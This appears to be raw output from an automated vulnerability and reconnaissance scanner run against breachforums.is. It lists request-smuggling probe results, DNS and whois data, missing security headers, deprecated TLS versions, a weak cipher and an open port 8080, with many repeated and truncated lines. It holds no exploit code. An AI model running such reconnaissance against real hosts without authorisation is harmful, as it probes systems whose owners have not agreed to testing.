[postspace-a0] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[prespace-a0]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspace-a0]  : OK (TECL: 0.17 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-a0] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-a0] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-a0]: OK (TECL: 0.17 - 400) (CLTE: 0.20 - 400)                                           
[xnprespace-a0]: OK (TECL: 0.18 - 400) (CLTE: 0.21 - 400)                                           
[endspacerx-a0]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-a0]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[midspace-ff]  : OK (TECL: 0.17 - 400) (CLTE: 0.20 - 400)                                           
[postspace-ff] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[prespace-ff]  : OK (TECL: 0.17 - 400) (CLTE: 0.18 - 400)                                           
[endspace-ff]  : OK (TECL: 0.18 - 400) (CLTE: 0.20 - 400)                                           
[xprespace-ff] : OK (TECL: 0.18 - 400) (CLTE: 0.26 - 400)                                           
[endspacex-ff] : OK (TECL: 0.24 - 400) (CLTE: 0.29 - 400)                                           
[rxprespace-ff]: OK (TECL: 0.25 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-ff]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-ff]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-ff]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
====================================================================================•x[2023-09-17](21:03)x•
 RUNNING NUCLEI SCAN 
====================================================================================•x[2023-09-17](21:03)x•
[dmarc-detect] [dns] [info] _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]
[dns-saas-service-detection:cloudflare-cdn] [dns] [info] breachforums.is
[mx-fingerprint] [dns] [info] breachforums.is [10 mail.breachforums.is.]
[txt-fingerprint] [dns] [info] breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                                                                         
[nameserver-fingerprint] [dns] [info] breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]
[dns-waf-detect:cloudflare] [dns] [info] breachforums.is
[google-floc-disabled] [http] [info] https://breachforums.is:443
[tech-detect:cloudflare] [http] [info] https://breachforums.is:443
[http-missing-security-headers:strict-transport-security] [http] [info] https://breachforums.is:443
[http-missing-security-headers:content-security-policy] [http] [info] https://breachforums.is:443
[http-missing-security-headers:x-content-type-options] [http] [info] https://breachforums.is:443
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] https://breachforums.is:443
[http-missing-security-headers:clear-site-data] [http] [info] https://breachforums.is:443
[rdap-whois:raw] [http] [info] https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted rights.\nExcept for agreed Internet operational purposes, no part of this publication may be reproduced, stored \nin a retrieval system, or transmitted, in any form or by any means, electronic, mechanical, recording, or \notherwise, without prior permission from ISNIC. Any use of this material to target advertising or similar \nactivities is explicitly forbidden and will be prosecuted. ISNIC requests to be notified of any such \nactivities or suspicions thereof."],"links":[{"href":"https://www.isnic.is/en/about/copyright","rel":"self","type":"text/html","value":"https://www.isnic.is/en/about/copyright"}],"title":"Copyright ©2023"},{"description":["23.162.0.39/32","2023-09-18 04:05:27.152976+00"],"title":"client info"}],"objectClassName":"domain","rdapConformance":["rdap_level_0","isnic_level_0"],"secureDNS":{"delegationSigned":false},"status":["active"],"unicodeName":"breachforums.is"}]                                                       
[rdap-whois:email] [http] [info] https://rdap.isnic.is/rdap/domain/breachforums.is [noc@cloudflare.com,abuse@flokinet.is]                                                                                                               
[rdap-whois:secureDNS] [http] [info] https://rdap.isnic.is/rdap/domain/breachforums.is [false]
[waf-detect:cloudflare] [http] [info] https://breachforums.is:443/
[ssl-issuer] [ssl] [info] breachforums.is:443 [Google Trust Services LLC]
[ssl-dns-names] [ssl] [info] breachforums.is:443 [breachforums.is,*.breachforums.is]
[deprecated-tls] [ssl] [info] breachforums.is:443 [tls10]
[deprecated-tls] [ssl] [info] breachforums.is:443 [tls11]
[tls-version] [ssl] [info] breachforums.is:443 [tls10]
[tls-version] [ssl] [info] breachforums.is:443 [tls11]
[weak-cipher-suites:tls-1.0] [ssl] [low] breachforums.is:443 [[tls10 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA]]
[tls-version] [ssl] [info] breachforums.is:443 [tls12]
[tls-version] [ssl] [info] breachforums.is:443 [tls13]
====================================================================================•x[2023-09-17](21:11)x•
 RUNNING SC0PE WEB VULNERABILITY SCAN 
====================================================================================•x[2023-09-17](21:11)x•
P5 - INFO, Server Header Disclosure - HTTPS, https://breachforums.is:443//, server: cloudflare
P4 - LOW, Strict Tranposrt Security Not Enforced, https://breachforums.is:443//, 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
P4 - LOW, Nuclei Vulnerability Scan, [weak-cipher-suites:tls-1.0], breachforums.is:443 [[tls10 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA]]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [noc@cloudflare.com,abuse@flokinet.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls12]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls13]                    
P5 - INFO, Robots.txt Detected,https://breachforums.is:443/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
P4 - LOW, Nuclei Vulnerability Scan, [weak-cipher-suites:tls-1.0], breachforums.is:443 [[tls10 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA]]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [noc@cloudflare.com,abuse@flokinet.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls12]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls13]                    
====================================================================================•x[2023-09-17](21:12)x•
 RUNNING SC0PE NETWORK VULNERABILITY SCAN 
====================================================================================•x[2023-09-17](21:12)x•
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
====================================================================================•x[2023-09-17](21:12)x•
====================================================================================•x[2023-09-17](21:12)x•
====================================================================================
•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• 
====================================================================================
Critical: 0
High: 0
Medium: 0
Low: 2
Info: 52
Score: 56
====================================================================================
P4 - LOW, Nuclei Vulnerability Scan, [weak-cipher-suites:tls-1.0], breachforums.is:443 [[tls10 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA]]                   
P4 - LOW, Strict Tranposrt Security Not Enforced, https://breachforums.is:443//, 
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
